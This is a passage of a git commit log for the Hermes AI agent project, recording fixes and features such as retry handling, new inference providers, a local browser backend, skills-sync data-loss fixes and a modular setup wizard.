2026-03-07 09:20:27 -08:00
teknium1
5a711f32b1 fix: enhance payload and context compression handling
Added logic to manage multiple compression attempts for large payloads and context length errors. Introduced limits on compression attempts to prevent infinite retries, with appropriate logging and error handling. This ensures better resilience and user feedback when facing compression issues during API calls.
2026-03-07 09:19:07 -08:00
0xbyt4
8c26a057a3 fix: reset all retry counters at start of run_conversation()
_incomplete_scratchpad_retries and _codex_incomplete_retries were not
reset at the start of run_conversation(). In CLI mode, where the same
AIAgent instance is reused across conversations, stale counters from
a previous conversation could carry over, causing premature retry
exhaustion and partial responses.
2026-03-07 20:12:08 +03:00
JackTheGit
ae4644f495 Fix Ruff lint warnings (unused imports and unnecessary f-strings) 2026-03-07 17:08:09 +00:00
teknium1
4d34427cc7 fix: update model version in agent configurations
Updated the default model version from "anthropic/claude-sonnet-4-20250514" to "anthropic/claude-sonnet-4.6" across multiple files including AGENTS.md, batch_runner.py, mini_swe_runner.py, and run_agent.py for consistency and to reflect the latest model improvements.
2026-03-07 09:06:37 -08:00
0xbyt4
70cffa4d3b fix: return "deny" on approval callback timeout instead of None
_approval_callback() had no return statement after the timeout break,
causing it to return None. Callers expect a string ("once", "session",
"always", or "deny"), so None could lead to undefined behavior when
approving dangerous commands.
2026-03-07 20:02:13 +03:00
0xbyt4
ee7d8c56c7 fix: prevent data loss in clipboard PNG conversion when ImageMagick fails
_convert_to_png() renamed the original file to .bmp before calling
ImageMagick convert, then unconditionally deleted the .bmp regardless
of whether convert succeeded. If convert failed, both files were gone.

- Only delete .bmp after confirmed successful conversion
- Restore original file on convert failure, timeout, or missing binary
- Add 3 tests covering failure, not-installed, and timeout scenarios
2026-03-07 20:02:12 +03:00
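
A sketch of the restore-on-failure flow described above; the ImageMagick 'convert' invocation follows the commit, paths and naming are illustrative:

    import subprocess
    from pathlib import Path

    def convert_to_png(src: Path) -> Path:
        bmp = src.with_suffix(".bmp")
        src.rename(bmp)
        png = src.with_suffix(".png")
        try:
            subprocess.run(["convert", str(bmp), str(png)], check=True, timeout=30)
        except (subprocess.CalledProcessError, subprocess.TimeoutExpired,
                FileNotFoundError):
            bmp.rename(src)        # restore the original instead of losing both files
            raise
        bmp.unlink()               # delete only after confirmed success
        return png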
teknium1
41877183bc Merge PR #604: fix(tests): isolate max_turns tests from CI env and update default to 90
Authored by 0xbyt4. Fixes test assertions broken by 0a82396 (60→90 default).
2026-03-07 08:57:36 -08:00
0xbyt4
451a007fb1 fix(tests): isolate max_turns tests from CI env and update default to 90
_make_cli() did not clear HERMES_MAX_ITERATIONS env var, so tests
failed in CI where the var was set externally. Also, default max_turns
changed from 60 to 90 in 0a82396 but tests were not updated.

- Clear HERMES_MAX_ITERATIONS in _make_cli() for proper isolation
- Add env_overrides parameter for tests that need specific env values
- Update hardcoded 60 assertions to 90 to match new default
- Simplify test_env_var_max_turns using env_overrides
2026-03-07 19:43:20 +03:00
teknium1
0a82396718 feat: shared iteration budget across parent + subagents
Subagent tool calls now count toward the same session-wide iteration
limit as the parent agent. Previously, each subagent had its own
independent counter, so a parent with max_iterations=60 could spawn
3 subagents each doing 50 calls = 150 total tool calls unmetered.

Changes:
- IterationBudget: thread-safe shared counter (run_agent.py)
  - consume(): try to use one iteration, returns False if exhausted
  - refund(): give back one iteration (for execute_code turns)
  - Thread-safe via Lock (subagents run in ThreadPoolExecutor)
- Parent creates the budget, children inherit it via delegate_tool.py
- execute_code turns are refunded (don't count against budget)
- Default raised from 60 → 90 to account for shared consumption
- Per-child cap (50) still applies as a safety valve

The per-child max_iterations (default 50) remains as a per-child
ceiling, but the shared budget is the hard session-wide limit.
A child stops at whichever comes first.
2026-03-07 08:16:37 -08:00
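
A minimal sketch of the shared budget as described above; method names and the default come from the commit, internals are illustrative:

    import threading

    class IterationBudget:
        """Session-wide tool-call budget shared by parent and subagents."""
        def __init__(self, limit: int = 90) -> None:
            self._remaining = limit
            self._lock = threading.Lock()   # subagents run in a ThreadPoolExecutor

        def consume(self) -> bool:
            with self._lock:
                if self._remaining <= 0:
                    return False            # exhausted: whoever asked must stop
                self._remaining -= 1
                return True

        def refund(self) -> None:
            with self._lock:
                self._remaining += 1        # e.g. execute_code turns don't count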
teknium1
5da55ea1e3 fix: sanitize orphaned tool-call/result pairs in message compression
Enhance message compression by adding a method to clean up orphaned tool-call and tool-result pairs. This ensures that the API receives well-formed messages, preventing errors related to mismatched IDs. The new functionality includes removing orphaned results and adding stub results for missing calls, improving overall message integrity during compression.
2026-03-07 08:08:00 -08:00
alireza78a
40bc7216e1 fix(security): use in-memory set for permanent allowlist save 2026-03-07 19:33:30 +03:30
0xbyt4
5cdcb9e26f fix: strip MarkdownV2 italic markers in Telegram plaintext fallback
When MarkdownV2 parsing fails, _strip_mdv2() removes escape backslashes
and bold markers (*text*) but missed italic markers (_text_). Users saw
raw underscores around italic text in the plaintext fallback.

- Add regex to strip _text_ italic markers in _strip_mdv2()
- Use word boundary lookaround to preserve snake_case identifiers
- Add tests for _strip_mdv2 covering italic, bold, snake_case, and edge cases
2026-03-07 18:55:25 +03:00
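
A sketch of the lookaround-based stripping described above; the regex is illustrative, and the real _strip_mdv2 also handles escapes and bold markers:

    import re

    # Match _italic_ only when the underscores are not flanked by word
    # characters, so snake_case identifiers are left untouched.
    _ITALIC = re.compile(r"(?<!\w)_([^_\n]+)_(?!\w)")

    def strip_italic(text: str) -> str:
        return _ITALIC.sub(r"\1", text)

    assert strip_italic("use _italics_ here") == "use italics here"
    assert strip_italic("keep snake_case_name") == "keep snake_case_name"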
areu01or00
ce7e7fef30 docs(skill): expand duckduckgo-search with DDGS Python API coverage
Add Python DDGS library examples for all 4 search types (text, news,
images, videos) with return field documentation, quick reference table,
and validated gotchas. Reorganize to put Python API primary, CLI secondary.
Soften Firecrawl-fallback framing. All examples validated on ddgs==9.11.2.
2026-03-07 21:15:29 +05:30
teknium1
064c009deb feat: show update-available notice in CLI banner
Check how many commits behind origin/main the local repo is and
display a warning in the welcome banner:

  ⚠ 12 commits behind — run hermes update to update

- git fetch cached for 6 hours (avoids repeated network calls)
- Falls back gracefully if offline or not a git repo
- Never breaks the banner — all errors silently caught
2026-03-07 07:35:36 -08:00
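
A sketch of the behind-count check with a cached fetch, per the commit above; the stamp-file location is hypothetical:

    import subprocess
    import time
    from pathlib import Path

    FETCH_STAMP = Path.home() / ".hermes" / "last_fetch"   # hypothetical cache marker

    def commits_behind(repo: Path) -> int | None:
        try:
            stale = (not FETCH_STAMP.exists()
                     or time.time() - FETCH_STAMP.stat().st_mtime > 6 * 3600)
            if stale:
                subprocess.run(["git", "fetch", "--quiet", "origin", "main"],
                               cwd=repo, check=True, timeout=15)
                FETCH_STAMP.parent.mkdir(parents=True, exist_ok=True)
                FETCH_STAMP.touch()
            out = subprocess.run(
                ["git", "rev-list", "--count", "HEAD..origin/main"],
                cwd=repo, check=True, capture_output=True, text=True, timeout=10,
            )
            return int(out.stdout.strip())
        except Exception:
            return None   # offline or not a git repo: never break the banner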
aydnOktay
86caa8539c Improve TTS error handling and logging 2026-03-07 16:53:30 +03:00
teknium1
caab1cf453 fix: update setup/config UI for local browser mode
- tools_config.py: Add 'Local Browser' as first provider option
  (no API keys needed, same npm install for agent-browser)
- setup.py: Show 'Browser Automation (local)' when agent-browser
  CLI is found but no Browserbase key is set
- config.py: Mark BROWSERBASE_* descriptions as optional
- status.py: Note that local browser works without Browserbase
2026-03-07 01:23:27 -08:00
teknium1
55c70f3508 fix: strip MarkdownV2 escapes from Telegram plaintext fallback
When Telegram's MarkdownV2 parser rejects a message, the send() fallback
was sending the already-escaped text as plain text. This caused users to
see raw backslashes before every special character (periods, dashes,
parentheses, etc.) — e.g. 'sentence\.' or '\-\-auto\-approve'.

Changes:
- Add _strip_mdv2() to reverse MarkdownV2 escaping for clean plaintext
- Use stripped text in the send() fallback path instead of raw escaped chunk
- Add logging when the MDV2 fallback is triggered for diagnostics
- Add logger to telegram.py (was missing)

The edit_message() fallback already correctly used the original content;
this brings send() in line with that behavior.
2026-03-07 01:23:18 -08:00
teknium1
d29249b8fa feat: local browser backend — zero-cost headless Chromium via agent-browser
Add local browser mode as an automatic fallback when Browserbase
credentials are not configured. Uses the same agent-browser CLI with
--session (local Chromium) instead of --cdp (cloud Browserbase).

The agent-facing API is completely unchanged — all 10 browser_* tools
produce identical output in both modes. Auto-detection:
  - BROWSERBASE_API_KEY set → cloud mode (existing behavior)
  - No key → local mode (new, free, headless Chromium)

Changes:
- _is_local_mode(): auto-detect based on env vars
- _create_local_session(): lightweight session (no API call)
- _get_session_info(): branches on local vs cloud
- _run_browser_command(): --session in local, --cdp in cloud
- check_browser_requirements(): only needs agent-browser CLI in local mode
- _emergency_cleanup: CLI close in local, API release in cloud
- cleanup_browser/browser_close: skip BB API calls in local mode
- Registry: removed requires_env — check_fn handles both modes

Setup for local mode:
  npm install -g agent-browser
  agent-browser install              # downloads Chromium
  agent-browser install --with-deps  # also installs system libs (Docker/Debian)

Closes #374 (Phase 1)
2026-03-07 01:14:57 -08:00
teknium1
f668e9fc75 feat: platform-conditional skill loading + Apple/macOS skills
Add a 'platforms' field to SKILL.md frontmatter that restricts skills
to specific operating systems. Skills with platforms: [macos] only
appear in the system prompt, skills_list(), and slash commands on macOS.
Skills without the field load everywhere (backward compatible).

Implementation:
- skill_matches_platform() in tools/skills_tool.py — core filter
- Wired into all 3 discovery paths: prompt_builder.py, skills_tool.py,
  skill_commands.py
- 28 new tests across 3 test files

New bundled Apple/macOS skills (all platforms: [macos]):
- imessage — Send/receive iMessages via imsg CLI
- apple-reminders — Manage Reminders via remindctl CLI
- apple-notes — Manage Notes via memo CLI
- findmy — Track devices/AirTags via AppleScript + screen capture

Docs updated: CONTRIBUTING.md, AGENTS.md, creating-skills.md,
skills.md (user guide)
2026-03-07 00:47:54 -08:00
teknium1
74fe1e2254 chore: remove TODO.md — all items tracked as issues
All remaining TODO items have covering issues:
- Local Browser via CDP: #374, #493
- Signal Integration: #405
- Plugin/Extension System: #359
- MCP Client Improvements: #581 (new)
- Filesystem Checkpointing: #452

Completed items (MCP core support) already shipped in PR #301.
2026-03-07 00:07:14 -08:00
teknium1
348936752a fix: simplify timezone migration to use os.getenv directly
The previous 'get_env_value' in dir() check always evaluated to False
(dir() returns local scope, not module scope), making the left branch
dead code. Simplified to just os.getenv() which was the fallback anyway.
2026-03-07 00:05:05 -08:00
teknium1
69a36a3361 Merge PR #309: fix(timezone): timezone-aware now() for prompt, cron, and execute_code
Authored by areu01or00. Adds timezone support via hermes_time.now() helper
with IANA timezone resolution (HERMES_TIMEZONE env → config.yaml → server-local).
Updates system prompt timestamp, cron scheduling, and execute_code sandbox TZ
injection. Includes config migration (v4→v5) and comprehensive test coverage.
2026-03-07 00:04:41 -08:00
Teknium
8712dd6d1c Merge pull request #308 from batuhankocyigit/patch-2
fix: rename misspelled directory 'fouth-edition' to 'fourth-edition'
2026-03-06 23:43:09 -08:00
teknium1
55a21fe37b docs: add Environments, Benchmarks & Data Generation guide
Comprehensive developer guide covering:
- Architecture (BaseEnv → HermesAgentBaseEnv → concrete envs)
- All three benchmarks (TerminalBench2, TBLite, YC-Bench)
- Training environments (TerminalTestEnv, HermesSweEnv)
- Core components (AgentLoop, ToolContext, Tool Call Parsers)
- Two-phase operation (Phase 1 OpenAI, Phase 2 VLLM)
- Running environments (evaluate, process, serve modes)
- Creating new environments (training + eval-only)
- Configuration reference and prerequisites

Also updates environments/README.md directory tree to include
TBLite and YC-Bench benchmarks.
2026-03-06 23:31:45 -08:00
teknium1
f55f625277 chore: reorder terminal backends in setup wizard
Local, Docker, Modal, SSH, Daytona, Singularity (Linux-only, last).
2026-03-06 22:21:57 -08:00
teknium1
9dac85b069 fix: uv pip install fails outside venv in setup wizard
uv pip install requires a virtual environment by default. When hermes
is installed system-wide or via pipx, the setup wizard's SDK installs
(daytona, swe-rex[modal], tinker-atropos) fail with 'No virtual
environment found'. Fix by passing --python sys.executable to uv,
which targets the correct Python regardless of venv state.

Also show the actual error message on install failure so users can
debug.
2026-03-06 21:55:33 -08:00
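
A sketch of the venv-agnostic install from the commit above; the package name is illustrative:

    import subprocess
    import sys

    def install_sdk(package: str) -> bool:
        # --python targets the interpreter running hermes, so uv works even
        # when no virtual environment is active (system-wide / pipx installs).
        proc = subprocess.run(
            ["uv", "pip", "install", "--python", sys.executable, package],
            capture_output=True, text=True,
        )
        if proc.returncode != 0:
            print(proc.stderr.strip())   # surface the actual error for debugging
        return proc.returncode == 0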
teknium1
99bd69baa8 Merge feat/modular-setup-wizard: modular setup wizard with section subcommands and tool-first UX
- 5 standalone sections: hermes setup [model|terminal|gateway|tools|agent]
- Returning user menu with section shortcuts
- Tool-first UX: category -> provider -> API key flow
- Unified hermes tools / hermes setup tools
- Fixed dict-format model config display bug

Closes #567
2026-03-06 21:12:30 -08:00
teknium1
a62a137a4f fix: handle dict-format model config in setup wizard display
config['model'] can be a dict (old format: {default, base_url, provider})
or a string (new format). The setup wizard was showing the raw dict in
'Keep current' and 'Model set to' messages. Now extracts the model name
from either format.
2026-03-06 21:11:40 -08:00
teknium1
82b18e8ac2 feat: unify hermes tools and hermes setup tools into single flow
Both 'hermes tools' and 'hermes setup tools' now use the same unified
flow in tools_config.py:

1. Select platform (CLI, Telegram, Discord, etc.)
2. Toggle all 18 toolsets on/off in checklist
3. Newly enabled tools that need API keys → provider-aware config
   (e.g., TTS shows Edge/OpenAI/ElevenLabs picker)
4. Already-configured tools that stay enabled → silent, no prompts
5. Menu option: 'Reconfigure an existing tool' for updating
   providers or API keys on tools that are already set up

Key changes:
- Move TOOL_CATEGORIES, provider config, and post-setup hooks from
  setup.py to tools_config.py
- Replace flat _check_and_prompt_requirements() with provider-aware
  _configure_toolset() that uses TOOL_CATEGORIES
- Add _reconfigure_tool() flow for updating existing configs
- setup.py's setup_tools() now delegates to tools_command()
- tools_command() menu adds 'Reconfigure' option alongside platforms
- Only prompt for API keys on tools that are NEWLY toggled on AND
  don't already have keys configured

No breaking changes. All 2013 tests pass.
2026-03-06 21:02:00 -08:00
teknium1
0111c9848d fix: remove ANSI codes and em dashes from menu labels
simple_term_menu miscalculates string widths when labels contain
ANSI escape codes (from color()) or em dashes, causing duplicated
and garbled lines on arrow key navigation.

Replace color() status indicators with plain text [configured]/[active]
and em dashes with regular dashes in all prompt_choice/prompt_checklist
labels.
2026-03-06 21:02:00 -08:00
teknium1
ab9cadfeee feat: modular setup wizard with section subcommands and tool-first UX
Restructure the monolithic hermes setup wizard into independently-runnable
sections with a category-first tool configuration experience.

Changes:
- Break setup into 5 sections: model, terminal, gateway, tools, agent
- Each section is a standalone function, runnable individually via
  'hermes setup model', 'hermes setup terminal', etc.
- Returning users get a menu: Quick Setup / Full Setup / individual sections
- First-time users get a guided walkthrough of all sections

Tool Configuration UX overhaul:
- Replace flat API key checklist with category-first approach
- Show tool types (TTS, Web Search, Image Gen, etc.) as top-level items
- Within each category, let users pick a provider:
  - TTS: Microsoft Edge (Free), OpenAI, ElevenLabs
  - Web: Firecrawl Cloud, Firecrawl Self-Hosted
  - Image Gen: FAL.ai
  - Browser: Browserbase
  - Smart Home: Home Assistant
  - RL Training: Tinker/Atropos
  - GitHub: Personal Access Token
- Shows configured status on each tool and provider
- Only prompts for API keys after provider selection

Also:
- Add section argument to setup argparse parser in main.py
- Update summary to show new section commands
- Add self-hosted Firecrawl and Home Assistant to tool setup
- All 2013 tests pass
2026-03-06 21:02:00 -08:00
PercyDikec
8bf28e1441 fix(setup): prevent OpenRouter model list fallback for Nous provider
When `fetch_nous_models()` fails silently during setup, the model
selection falls through to the OpenRouter static list. Users then pick
models in OpenRouter format (e.g. `anthropic/claude-opus-4.6`) which
the Nous inference API rejects with a 400 "missing model" error.

Add an explicit `elif selected_provider == "nous"` branch that prompts
for manual model entry instead of falling through to the generic
OpenRouter fallback.
2026-03-07 07:16:22 +03:00
teknium1
ce28f847ce fix: update OpenRouter model names for yc-bench config
Use anthropic/claude-sonnet-4.6 (OpenRouter format) instead of
anthropic/claude-sonnet-4-20250514 (direct API format).
2026-03-06 19:58:56 -08:00
stablegenius49
5609117882 fix(doctor): recognize OPENAI_API_KEY custom endpoint config 2026-03-06 19:47:09 -08:00
teknium1
b4fbb6fe10 feat: add YC-Bench long-horizon agent benchmark environment
Adds eval-only benchmark for YC-Bench (collinear-ai/yc-bench), a
deterministic long-horizon benchmark where the agent acts as CEO of an
AI startup over a simulated 1-3 year run.

Key design decisions verified against the official yc-bench repo:
- Uses 'sim init' (NOT 'yc-bench run') to avoid starting a competing
  built-in agent loop
- Correct DB table names: 'companies' and 'sim_events'
- Correct 4 domains: research, inference, data_environment, training
- Penalty values are preset-dependent (not hardcoded in system prompt)
- Sequential evaluation (each run is 100-500 turns)
- Follows TerminalBench2 patterns: KeyboardInterrupt handling,
  cleanup_all_environments(), tqdm logging handler, streaming JSONL

yc-bench added as optional dependency: pip install hermes-agent[yc-bench]

Closes #340
2026-03-06 19:25:56 -08:00
teknium1
82d7e9429e chore: add GLM/Kimi/MiniMax models to insights pricing (zero cost)
These direct providers don't return cost in API responses and their
per-token pricing isn't readily available externally. Treat as local
models with zero cost so they appear in /insights without fake estimates.
2026-03-06 19:12:14 -08:00
teknium1
e2821effb5 feat: add direct API-key providers as auxiliary client fallbacks
When the user only has a z.ai/Kimi/MiniMax API key (no OpenRouter key),
auxiliary tasks (context compression, web summarization, session search)
now fall back to the configured direct provider instead of returning None.

Resolution chain: OpenRouter -> Nous -> Custom endpoint -> Codex OAuth
-> direct API-key providers -> None.

Uses cheap/fast models for auxiliary tasks:
- zai: glm-4.5-flash
- kimi-coding: kimi-k2-turbo-preview
- minimax/minimax-cn: MiniMax-M2.5-highspeed

Vision auxiliary intentionally NOT modified — vision needs multimodal
models (Gemini) that these providers don't serve.
2026-03-06 19:08:54 -08:00
teknium1
9742f11fda chore: add context lengths for Kimi and MiniMax models
Adds DEFAULT_CONTEXT_LENGTHS entries for kimi-k2.5 (262144), kimi-k2-thinking
(262144), kimi-k2-turbo-preview (262144), kimi-k2-0905-preview (131072),
MiniMax-M2.5/M2.5-highspeed/M2.1 (204800), and glm-4.5/4.5-flash (131072).

Avoids unnecessary 2M-token probe on first use with direct providers.
2026-03-06 19:01:38 -08:00
Tyler
53b4b7651a Add official OpenClaw migration skill for Hermes Agent
Introduces a new OpenClaw-to-Hermes migration skill with a Python
helper script that handles importing SOUL.md, memories, user profiles,
messaging settings, command allowlists, skills, TTS assets, and
workspace instructions.

Supports two migration presets (user-data / full), three skill conflict
modes (skip / overwrite / rename), overflow file export for entries that
exceed character limits, and granular include/exclude option filtering.

Includes detailed SKILL.md agent instructions covering the clarify-tool
interaction protocol, decision-to-command mapping, post-run reporting
rules, and path resolution guidance.

Adds dynamic panel width calculation to CLI clarify/approval widgets so
panels adapt to content and terminal size.

Includes 7 new tests covering presets, include/exclude, conflict modes,
overflow exports, and skills_guard integration.
2026-03-06 18:57:12 -08:00
teknium1
388dd4789c feat: add z.ai/GLM, Kimi/Moonshot, MiniMax as first-class providers
Adds 4 new direct API-key providers (zai, kimi-coding, minimax, minimax-cn)
to the inference provider system. All use standard OpenAI-compatible
chat/completions endpoints with Bearer token auth.

Core changes:
- auth.py: Extended ProviderConfig with api_key_env_vars and base_url_env_var
  fields. Added providers to PROVIDER_REGISTRY. Added provider aliases
  (glm, z-ai, zhipu, kimi, moonshot). Added auto-detection of API-key
  providers in resolve_provider(). Added resolve_api_key_provider_credentials()
  and get_api_key_provider_status() helpers.
- runtime_provider.py: Added generic API-key provider branch in
  resolve_runtime_provider() — any provider with auth_type='api_key'
  is automatically handled.
- main.py: Added providers to hermes model menu with generic
  _model_flow_api_key_provider() flow. Updated _has_any_provider_configured()
  to check all provider env vars. Updated argparse --provider choices.
- setup.py: Added providers to setup wizard with API key prompts and
  curated model lists.
- config.py: Added env vars (GLM_API_KEY, KIMI_API_KEY, MINIMAX_API_KEY,
  etc.) to OPTIONAL_ENV_VARS.
- status.py: Added API key display and provider status section.
- doctor.py: Added connectivity checks for each provider endpoint.
- cli.py: Updated provider docstrings.

Docs: Updated README.md, .env.example, cli-config.yaml.example,
cli-commands.md, environment-variables.md, configuration.md.

Tests: 50 new tests covering registry, aliases, resolution, auto-detection,
credential resolution, and runtime provider dispatch.

Inspired by PR #33 (numman-ali) which proposed a provider registry approach.
Credit to tars90percent (PR #473) and manuelschipper (PR #420) for related
provider improvements merged earlier in this changeset.
2026-03-06 18:55:18 -08:00
Teknium
fdebca4573 Merge pull request #571 from NousResearch/rewbs/nous-key-remint-attempt-on-401
fix: implement Nous credential refresh on 401 error for retry logic
2026-03-06 18:52:01 -08:00
teknium1
479dfc096a Merge PR #473: Update model id in OpenRouter from minimax-m2.1 to minimax-m2.5
Authored by tars90percent. Updates remaining minimax-m2.1 references to
minimax-m2.5 in rl_training_tool.py and docs.
2026-03-06 18:43:18 -08:00
teknium1
3c6c11b7c9 Merge PR #420: fix: respect OPENAI_BASE_URL when resolving API key priority
Authored by manuelschipper. Adds GLM-4.7 and GLM-5 context lengths (202752)
to model_metadata.py. The key priority fix (prefer OPENAI_API_KEY for
non-OpenRouter endpoints) was already applied in PR #295; merged the Z.ai
mention into the comment.
2026-03-06 18:43:13 -08:00
Robin Fernandes
bc091eb7ef fix: implement Nous credential refresh on 401 error for retry logic 2026-03-07 13:34:23 +11:00
alireza78a
a857321463 fix(code-execution): close server socket in finally block to prevent fd leak 2026-03-07 05:49:48 +03:30
teknium1
f75b1d21b4 fix: execute_code and delegate_task now respect disabled toolsets
When a user disables the web toolset via 'hermes tools', the execute_code
schema description still hardcoded web_search/web_extract as available,
causing the model to keep trying to use them. Similarly, delegate_task
always defaulted to ['terminal', 'file', 'web'] for subagents regardless
of the parent's config.

Changes:
- execute_code schema is now built dynamically via build_execute_code_schema()
  based on which sandbox tools are actually enabled
- model_tools.py rebuilds the execute_code schema at definition time using
  the intersection of sandbox-allowed and session-enabled tools
- delegate_task now inherits the parent agent's enabled_toolsets instead of
  hardcoding DEFAULT_TOOLSETS when no explicit toolsets are specified
- delegate_task description updated to say 'inherits your enabled toolsets'

Reported by kotyKD on Discord.
2026-03-06 17:36:14 -08:00
0xbyt4
33cfe1515d fix: sanitize FTS5 queries and close mirror DB connections
Two bugs fixed:

1. search_messages() crashes with OperationalError when user queries
   contain FTS5 special characters (+, ", (, {, dangling AND/OR, etc).
   Added _sanitize_fts5_query() to strip dangerous operators and a
   fallback try-except for edge cases.

2. _append_to_sqlite() in mirror.py creates a new SessionDB per call
   but never closes it, leaking SQLite connections. Added finally block
   to ensure db.close() is always called.
2026-03-07 04:24:45 +03:00
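A minimal sketch of fix 1, assuming an FTS5 table named messages_fts (the sanitizer's exact character set and the schema are assumptions):

```python
import re
import sqlite3

def _sanitize_fts5_query(query: str) -> str:
    # Strip FTS5 operator characters that make raw user text an invalid MATCH query.
    cleaned = re.sub(r'[+"(){}\[\]^*:]', " ", query)
    # Drop dangling boolean operators at either edge.
    cleaned = re.sub(r"^\s*(AND|OR|NOT)\b|\b(AND|OR|NOT)\s*$", " ", cleaned)
    return " ".join(cleaned.split())

def search_messages(conn: sqlite3.Connection, query: str) -> list:
    try:
        return conn.execute(
            "SELECT rowid FROM messages_fts WHERE messages_fts MATCH ?",
            (_sanitize_fts5_query(query),),
        ).fetchall()
    except sqlite3.OperationalError:
        return []  # fallback for edge cases the sanitizer misses
```

Fix 2 is the usual pattern: open the SessionDB in a try block and call db.close() in a finally so the connection is released even when the append raises.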
teknium1
94053d75a6 fix: custom endpoint no longer leaks OPENROUTER_API_KEY (#560)
API key selection is now base_url-aware: when the resolved base_url
targets OpenRouter, OPENROUTER_API_KEY takes priority (preserving the
#289 fix). When hitting any other endpoint (Z.ai, vLLM, custom, etc.),
OPENAI_API_KEY takes priority so the OpenRouter key doesn't leak.

Applied in both the runtime provider resolver (the real code path) and
the CLI initial default (for consistency).

Fixes #560.
2026-03-06 17:16:14 -08:00
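The priority logic reads roughly like this sketch (the function name and the openrouter.ai substring check are assumptions):

```python
import os

def pick_api_key(base_url: str | None) -> str | None:
    if base_url and "openrouter.ai" in base_url:
        # OpenRouter endpoint: OPENROUTER_API_KEY takes priority (preserves #289).
        return os.getenv("OPENROUTER_API_KEY") or os.getenv("OPENAI_API_KEY")
    # Any other endpoint (Z.ai, vLLM, custom): OPENAI_API_KEY takes priority,
    # so the OpenRouter key isn't sent to third-party hosts by default.
    return os.getenv("OPENAI_API_KEY") or os.getenv("OPENROUTER_API_KEY")
```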
teknium1
2a68099675 fix(tests): isolate tests from user ~/.hermes/ config and SOUL.md
_make_cli() now patches CLI_CONFIG with clean defaults so
test_cli_init tests don't depend on the developer's local config.yaml.
test_empty_dir_returns_empty now mocks Path.home() so it doesn't pick
up a global SOUL.md.

Credit to teyrebaz33 for identifying and fixing these in PR #557.
Fixes #555.
2026-03-06 17:10:35 -08:00
0xbyt4
3b43f7267a fix: count actual tool calls instead of tool-related messages
tool_call_count was inaccurate in two ways:

1. Under-counting: an assistant message with N parallel tool calls
   (e.g. "kill the light and shut off the fan" = 2 ha_call_service)
   only incremented tool_call_count by 1 instead of N.

2. Over-counting: tool response messages (role=tool) also incremented
   tool_call_count, double-counting every tool interaction.

Combined: 2 parallel tool calls produced tool_call_count=3 (1 from
assistant + 2 from tool responses) instead of the correct value of 2.

Fix: only count from assistant messages with tool_calls, incrementing
by len(tool_calls) to handle parallel calls correctly. Tool response
messages no longer affect tool_call_count.

This impacts /insights and /usage accuracy for sessions with tool use.
2026-03-07 04:07:52 +03:00
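The corrected counting, as a small sketch over OpenAI-style message dicts:

```python
def count_tool_calls(messages: list[dict]) -> int:
    total = 0
    for msg in messages:
        # Only assistant messages count, and parallel calls count as N, not 1.
        if msg.get("role") == "assistant" and msg.get("tool_calls"):
            total += len(msg["tool_calls"])
        # role == "tool" responses deliberately do not increment the counter.
    return total
```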
teknium1
6cd3bc6640 Merge PR #563: fix: prevent data loss in skills sync on copy/update failure
Authored by 0xbyt4. Two bugs fixed:
1. Failed copytree no longer poisons the manifest (skill gets retried)
2. Failed update no longer destroys user's copy (backup + restore)
2026-03-06 17:01:30 -08:00
0xbyt4
211b55815e fix: prevent data loss in skills sync on copy/update failure
Two bugs in sync_skills():

1. Failed copytree poisons manifest: when shutil.copytree fails (disk
   full, permission error), the skill is still recorded in the manifest.
   On the next sync, the skill appears as "in manifest but not on disk"
   which is interpreted as "user deliberately deleted it" — the skill
   is never retried.  Fix: only write to manifest on successful copy.

2. Failed update destroys user copy: rmtree deletes the existing skill
   directory before copytree runs. If copytree then fails, the user's
   skill is gone with no way to recover.  Fix: move to .bak before
   copying, restore from backup if copytree fails.

Both bugs are proven by new regression tests that fail on the old code
and pass on the fix.
2026-03-07 03:58:32 +03:00
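Both fixes combine into one update path, sketched here (helper names and the dir_hash callback are illustrative):

```python
import shutil
from pathlib import Path

def update_skill(bundled: Path, dest: Path, manifest: dict, dir_hash) -> None:
    backup = dest.parent / (dest.name + ".bak")
    if dest.exists():
        shutil.move(str(dest), str(backup))  # keep the user's copy recoverable
    try:
        shutil.copytree(bundled, dest)
    except OSError:
        if backup.exists():
            shutil.move(str(backup), str(dest))  # failed update: restore, don't destroy
        raise
    # Record in the manifest only after a successful copy, so a failed copytree
    # is retried on the next sync instead of looking like a user deletion.
    manifest[dest.name] = dir_hash(dest)
    if backup.exists():
        shutil.rmtree(backup)
```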
teknium1
8ae4a6f824 fix: improve handling of empty responses after tool calls
- Added a fallback that reuses prior content when the model returns an empty response after tool calls, avoiding unnecessary API retries.
- Added logging to indicate when prior content is used as the final response.
- Genuine empty responses (with no prior content to fall back on) are still retried as before.
2026-03-06 16:54:31 -08:00
teknium1
b98301677a docs: add /insights to all help menus and documentation
- website/docs/reference/cli-commands.md: Added 'hermes insights' terminal
  command section with --days and --source flags, plus /insights slash command
  in the Conversation section
- website/docs/user-guide/cli.md: Added /insights to slash commands table
- website/docs/user-guide/messaging/index.md: Added /insights to gateway
  chat commands table
- website/docs/user-guide/sessions.md: Added cross-reference to hermes
  insights from the sessions stats section
2026-03-06 16:48:58 -08:00
teknium1
f2fdde5ba4 fix: show user-modified skills count in hermes update output 2026-03-06 16:14:43 -08:00
teknium1
4f56e31dc7 fix: track origin hashes in skills manifest to preserve user modifications
Upgrade skills_sync manifest to v2 format (name:origin_hash). The origin
hash records the MD5 of the bundled skill at the time it was last synced.

On update, the user's copy is compared against the origin hash:
- User copy == origin hash → unmodified → safe to update from bundled
- User copy != origin hash → user customized → skip (preserve changes)

v1 manifests (plain names) are auto-migrated: the user's current hash
becomes the baseline, so future syncs can detect modifications.

Output now shows user-modified skills:
  ~ whisper (user-modified, skipping)

27 tests covering all scenarios including v1→v2 migration, user
modification detection, update after migration, and origin hash tracking.
2009 tests pass.
2026-03-06 16:13:58 -08:00
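The comparison at the heart of the v2 manifest, sketched (only the MD5 origin-hash idea comes from the message; the exact hashing scheme over the skill directory is an assumption):

```python
import hashlib
from pathlib import Path

def dir_md5(path: Path) -> str:
    # Order-stable hash over relative paths + contents (assumed scheme).
    h = hashlib.md5()
    for f in sorted(path.rglob("*")):
        if f.is_file():
            h.update(str(f.relative_to(path)).encode())
            h.update(f.read_bytes())
    return h.hexdigest()

def safe_to_update(user_copy: Path, origin_hash: str) -> bool:
    # Equal to origin hash -> user never modified it -> update from bundled.
    # Different -> user customized -> skip and preserve their changes.
    return dir_md5(user_copy) == origin_hash
```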
Teknium
6d3804770c Merge pull request #552 from NousResearch/feat/insights
feat: /insights command — usage analytics, cost estimation & activity patterns
2026-03-06 16:00:28 -08:00
teknium1
ab0f4126cf fix: restore all removed bundled skills + fix skills sync system
- Restored 21 skills removed in commits 757d012 and 740dd92:
  accelerate, audiocraft, code-review, faiss, flash-attention, gguf,
